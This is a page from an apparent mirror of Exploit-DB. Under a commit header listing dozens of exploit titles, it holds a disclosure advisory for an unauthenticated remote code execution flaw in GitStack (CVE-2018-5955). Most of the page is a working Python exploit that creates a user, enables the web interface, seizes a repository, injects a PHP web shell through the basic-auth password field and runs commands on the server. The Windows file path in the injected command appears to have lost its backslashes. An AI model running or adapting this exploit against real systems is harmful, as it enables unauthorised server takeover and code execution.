bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/44044.md
Offensive Security e630f8c249 DB: 2018-02-16 
45 changes to exploits/shellcodes

Cisco ASA - Crash PoC
Cisco ASA - Crash (PoC)

GNU binutils 2.26.1 - Integer Overflow (POC)
GNU binutils 2.26.1 - Integer Overflow (PoC)
K7 Total Security 15.1.0.305 - Device Driver Arbitrary Memory Read
Linux Kernel - 'AF_PACKET' Use-After-Free
Oracle Java JDK/JRE < 1.8.0.131 / Apache Xerces 2.11.0 - 'PDF/Docx' Server Side Denial of Service
Microsoft Edge Chakra JIT - 'GlobOpt::OptTagChecks' Must Consider IsLoopPrePass Properly (2)
Microsoft Edge Chakra JIT - Memory Corruption
Microsoft Edge Chakra JIT - ImplicitCallFlags Checks Bypass
Microsoft Edge Chakra JIT - Array Type Confusion via InitProto Instructions
Microsoft Edge Chakra JIT - 'Array.prototype.reverse' Array Type Confusion
Microsoft Edge Chakra JIT - 'NewScObjectNoCtor' Array Type Confusion
Microsoft Edge Chakra JIT - 'LdThis' Type Confusion
Pdfium - Pattern Shading Integer Overflows
Pdfium - Out-of-Bounds Read with Shading Pattern Backed by Pattern Colorspace
Chrome V8 - 'Runtime_RegExpReplace' Integer Overflow
Hotspot Shield - Information Disclosure
Linux Kernel (Ubuntu 17.04) - 'XFRM' Local Privilege Escalation
Nitro Pro PDF - Multiple Vulnerabilities
Odoo CRM 10.0 - Code Execution
Dashlane - DLL Hijacking

LightDM (Ubuntu 16.04/16.10) - Guest Account Local Privilege Escalation
LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation
Trustwave SWG 11.8.0.27 - SSH Unauthorized Access
Ichano AtHome IP Cameras - Multiple Vulnerabilities
Cisco UCS Platform Emulator 3.1(2ePE1) - Remote Code Execution
Ikraus Anti Virus 2.16.7 - Remote Code Execution
McAfee Security Scan Plus - Remote Command Execution
OrientDB - Code Execution
360 Total Security - Local Privilege Escalation
HPE Intelligent Management Center (iMC) 7.2 (E0403P10) - Code Execution
Oracle Knowledge Management 12.1.1 < 12.2.5 - XML External Entity Leading To Remote Code Execution
iBall WRA150N - Multiple Vulnerabilities
GitStack - Unauthenticated Remote Code Execution
Monstra CMS - Remote Code Execution
Ametys CMS 4.0.2 - Unauthenticated Password Reset
DblTek - Multiple Vulnerabilities
FiberHome - Directory Traversal
PHP Melody 2.7.3 - Multiple Vulnerabilities
Tiandy IP Cameras 5.56.17.120 - Sensitive Information Disclosure
Horde Groupware 5.2.21 - Unauthorized File Download
QNAP HelpDesk < 1.1.12 - SQL Injection
Hanbanggaoke IP Camera - Arbitrary Password Change
McAfee LiveSafe 16.0.3 - Man In The Middle Registry Modification Leading to Remote Command Execution
Sophos XG Firewall 16.05.4 MR-4 - Path Traversal
Cisco DPC3928 Router - Arbitrary File Disclosure
IDERA Uptime Monitor 7.8 - Multiple Vulnerabilities
Geneko Routers - Unauthenticated Path Traversal
Dasan Networks GPON ONT WiFi Router H640X versions 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution
2018-02-16 05:01:50 +00:00

4.3 KiB
Raw Blame History

Vulnerability Summary

The following advisory describes an unauthenticated action that allows a remote attacker to add a user to GitStack and then used to trigger an unauthenticated remote code execution.

GitStack is “a software that lets you setup your own private Git server for Windows. This means that you create a leading edge versioning system without any prior Git knowledge. GitStack also makes it super easy to secure and keep your server up to date. GitStack is built on the top of the genuine Git for Windows and is compatible with any other Git clients. GitStack is completely free for small teams.”

Credit

An independent security researcher, Kacper Szurek, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program.

Vendor response

We tried to contact GitStack since October 17 2017, repeated attempts to establish contact were answered, but no details have been provided on a solution or a workaround.

CVE: CVE-2018-5955

Vulnerability details

User controlled input is not sufficiently filtered, allowing an unauthenticated attacker can add a user to GitStack server by sending the following POST request:

http://IP/rest/user/
data={'username' : username, 'password' : password}

Once the attacker has added a user to the server, he can enable the web repository feature.

Now the attacker can create a repository from remote and disable access to our new repository for anyone else.

In the repository the attacker is allowed to upload a backdoor and use it to execute code:

Proof of Concept

import requests
from requests.auth import HTTPBasicAuth
import os
import sys

ip = '192.168.15.102'

# What command you want to execute
command = "whoami"

repository = 'rce'
username = 'rce'
password = 'rce'
csrf_token = 'token'

user_list = []

print "[+] Get user list"
r = requests.get("http://{}/rest/user/".format(ip))
try:
 user_list = r.json()
 user_list.remove('everyone')
except:
 pass

if len(user_list) > 0:
 username = user_list[0]
 print "[+] Found user {}".format(username)
else:
 r = requests.post("http://{}/rest/user/".format(ip), data={'username' : username, 'password' : password})
 print "[+] Create user"
 if not "User created" in r.text and not "User already exist" in r.text:
  print "[-] Cannot create user"
  os._exit(0)

r = requests.get("http://{}/rest/settings/general/webinterface/".format(ip))
if "true" in r.text:
 print "[+] Web repository already enabled"
else:
 print "[+] Enable web repository"
 r = requests.put("http://{}/rest/settings/general/webinterface/".format(ip), data='{"enabled" : "true"}')
 print "r: %s" % r
 if not "Web interface successfully enabled" in r.text:
  print "[-] Cannot enable web interface"
  os._exit(0)

print "[+] Get repositories list"
r = requests.get("http://{}/rest/repository/".format(ip))
repository_list = r.json()

if len(repository_list) > 0:
 repository = repository_list[0]['name']
 print "[+] Found repository {}".format(repository)
else:
 print "[+] Create repository"


r = requests.post("http://{}/rest/repository/".format(ip), cookies={'csrftoken' : csrf_token}, data={'name' : repository, 'csrfmiddlewaretoken' : csrf_token})
if not "The repository has been successfully created" in r.text and not "Repository already exist" in r.text:
 print "[-] Cannot create repository"
 os._exit(0)

print "[+] Add user to repository"
r = requests.post("http://{}/rest/repository/{}/user/{}/".format(ip, repository, username))

if not "added to" in r.text and not "has already" in r.text:
 print "[-] Cannot add user to repository"
 os._exit(0)

print "[+] Disable access for anyone"
r = requests.delete("http://{}/rest/repository/{}/user/{}/".format(ip, repository, "everyone"))

if not "everyone removed from rce" in r.text and not "not in list" in r.text:
 print "[-] Cannot remove access for anyone"
 os._exit(0)

print "[+] Create backdoor in PHP"
r = requests.get('http://{}/web/index.php?p={}.git&a=summary'.format(ip, repository), auth=HTTPBasicAuth(username, 'p && echo "<?php system($_POST['a']); ?>" > c:GitStackgitphpexploit.php'))
print r.text.encode(sys.stdout.encoding, errors='replace')

print "[+] Execute command"
r = requests.post("http://{}/web/exploit.php".format(ip), data={'a' : command})
print r.text.encode(sys.stdout.encoding, errors='replace')